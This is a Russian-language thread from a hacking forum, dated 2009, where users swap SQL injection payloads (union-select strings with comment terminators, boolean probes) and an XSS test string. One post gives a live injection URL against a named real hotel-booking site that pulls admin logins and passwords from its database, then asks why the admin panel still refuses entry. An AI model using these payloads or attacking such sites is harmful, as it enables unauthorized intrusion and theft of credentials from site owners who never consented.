ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.10.2009, 13:07
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

"SELECT page_id,page_title FROM page WHERE page_id='{INJ} '";
сегодня тестил , у меня немного другой запрос ,но это сути не меняет:
Код:
$id=stripslashes($_GET['newsid']);
$news = mysql_query("select *  from  `news` where id ='$id'")
or die(mysql_error());
(в таблице `news` - 6 полей), думаю тут все понятно,+вклеил mysql_error(); послушать что мускул глаголит.
при манипулировании с разными вариантами запроса ,подошел :
Код:
?newsid=-1'+union+select+1,2,3,4,5,6/*
с комментарием /* , другие :
#,--, - не катят,голову сломал ,но хз почему (пробавал однострочный запрос , результат - тот же)
то есть так как описал jokester:
Цитата:
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #2  
Старый 25.10.2009, 23:11
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

введ в поле "><script>alert(1)</script>

а в ответ

Цитата:
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").

Ошибка источника:

[Отсутствуют соответствующие исходные строки]


Исходный файл: c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs Строка: 0

Трассировка стека:

[HttpRequestValidationException (0x80004005): Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8721914
System.Web.HttpRequest.ValidateNameValueCollection (NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_Form() +129
System.Web.HttpRequest.get_HasForm() +8722023
System.Web.UI.Page.GetCollectionBasedOnMethod(Bool ean dontReturnNull) +97
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(Http Context context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.newstudent_aspx.ProcessRequest(HttpContext context) in c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.Htt pApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionS tep step, Boolean& completedSynchronously) +75


Информация о версии: Платформа Microsoft .NET Framework, версия:2.0.50727.3603; ASP.NET, версия:2.0.50727.3082
че за?????
 
Ответить с цитированием

  #3  
Старый 25.10.2009, 23:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Krist_ALL  
введ в поле "><script>alert(1)</script>

а в ответ


че за?????
Троль?
Цитата:
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").
Я в ужасе.
 
Ответить с цитированием

  #4  
Старый 25.10.2009, 23:19
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

я не пойму нафиг что ругается на ошибку. причем тут фрамеворк
 
Ответить с цитированием

  #5  
Старый 25.10.2009, 23:32
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами: 9231812

Репутация: 40
По умолчанию

Krist_ALL, это похоже на ColdFusion
 
Ответить с цитированием

  #6  
Старый 26.10.2009, 00:47
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

Код:
возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
Цитата:
Сообщение от Ctacok  
А почему же нет?
Цитата:
Сообщение от eliteload  
тогда такой вопрос.. какой запрос надо сделать, чтобы удачно провести инъекцию?
update :
сперва глянул на локалхосте :
1) ?page_id=1+and+1=1
2) ?page_id=1+and+1=2 (ответ тот же что и в первом)
вот по этому так и решил.

Последний раз редактировалось L I G A; 26.10.2009 в 12:22..
 
Ответить с цитированием

  #7  
Старый 26.10.2009, 01:00
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

если нет никаких "особых условий", то иньекция будет обычная, тоесть с нормальным выводом. Всё зависит от скрипта
 
Ответить с цитированием

  #8  
Старый 26.10.2009, 01:30
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами: 9107354

Репутация: 122
По умолчанию

Смотрите, есть табла админа с паролькой
Код:
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,11,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде
 
Ответить с цитированием

  #9  
Старый 26.10.2009, 01:33
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от TELO  
Смотрите, есть табла админа с паролькой
Код:
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,11,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде
Потому что у тебя на z_admin стоит бейсик авторизация.
 
Ответить с цитированием

  #10  
Старый 26.10.2009, 01:33
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

eliteload

-1 union select 1,2/*
либо
-1 union select 1,2,3,4,5,6,7/*

Вывод не зависит запроса к базе. Вывод это скрипт, т.к. скрипта не вижу, не знаю где будет вывод.

Опять-же повторюсь. это если в скрипте нет никаких заморочек типо die() при нулевом результате выборки и т.д.

ну и я не понял, ты там ' ' для обрамления поставил, или они в коде есть, если в коде то
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*

Последний раз редактировалось jokester; 26.10.2009 в 01:38..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.